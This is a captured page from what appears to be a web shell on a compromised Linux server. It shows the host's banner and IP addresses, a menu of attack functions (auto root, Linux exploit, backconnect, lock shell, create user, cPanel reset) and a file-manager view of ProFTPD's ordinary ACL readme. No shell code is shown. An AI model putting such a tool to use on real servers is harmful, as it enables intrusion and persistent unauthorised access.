Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
proftpd /
[ HOME SHELL ]
Name
Size
Permission
Action
contrib
[ DIR ]
drwxr-xr-x
howto
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
rfc
[ DIR ]
drwxr-xr-x
sample-configurations
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
CREDITS
2.2
KB
-rw-r--r--
ChangeLog
1.64
MB
-rw-r--r--
Configuration.html
534.86
KB
-rw-r--r--
Configuration.pdf
1.39
MB
-rw-r--r--
Configuration.sgml
675
B
-rw-r--r--
NEWS
176
KB
-rw-r--r--
README.DSO
2.47
KB
-rw-r--r--
README.IPv6
3.84
KB
-rw-r--r--
README.PAM
6.47
KB
-rw-r--r--
README.capabilities
2.21
KB
-rw-r--r--
README.classes
611
B
-rw-r--r--
README.contrib
968
B
-rw-r--r--
README.controls
1.98
KB
-rw-r--r--
README.facl
1.6
KB
-rw-r--r--
README.md
4.62
KB
-rw-r--r--
README.modules
6.79
KB
-rw-r--r--
README.ratio
5.21
KB
-rw-r--r--
faq.html
93.22
KB
-rw-r--r--
license.txt
1.17
KB
-rw-r--r--
mod_sample.c
11.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.facl
POSIX ACLs (File ACLs) ---------------------- As of 1.3.0rc1, ProFTPD has support for POSIX ACLs. This is a new feature and should be considered experimental. For more information on what POSIX ACLs are and how they work, see "POSIX ACLs on Linux": http://www.suse.de/~agruen/acl/linux-acls/online/ POSIX ACLs are supported and implemented differently on Linux, BSD, and Solaris. ProFTPD attempts to work properly with POSIX ACLs on all of these platforms. The configure script automatically checks to see if your system has support for POSIX ACLs. However, proftpd will not make use of any POSIX ACL support unless specifically requested: ./configure --enable-facl ... This configure option tells proftpd to compile and link against the proper libraries. However, to make proftpd fully honor any POSIX ACLs on files, you will also need the mod_facl module: ./configure --enable-facl --with-modules=mod_facl ... Note that on some systems (notably Red Hat installations), you may encounter the following error when compiling proftpd with ACL support: libtool: link: cannot find the library `/lib/libattr.la' This is caused by a bug in the /usr/lib/libacl.la file. This is a text file which mentions /lib/libattr.la, when it should use /usr/lib/libattr.la. You may have to manually edit the /usr/lib/libacl.la file to correct the problem. Future work on ProFTPD's support of POSIX ACLs will most likely include changing mod_ls so that it displays a '+' symbol when LISTing files, denoting a file marked with POSIX ACLs, and perhaps adding support for SITE commands for manipulating ACLs (similar to SITE CHMOD).
Close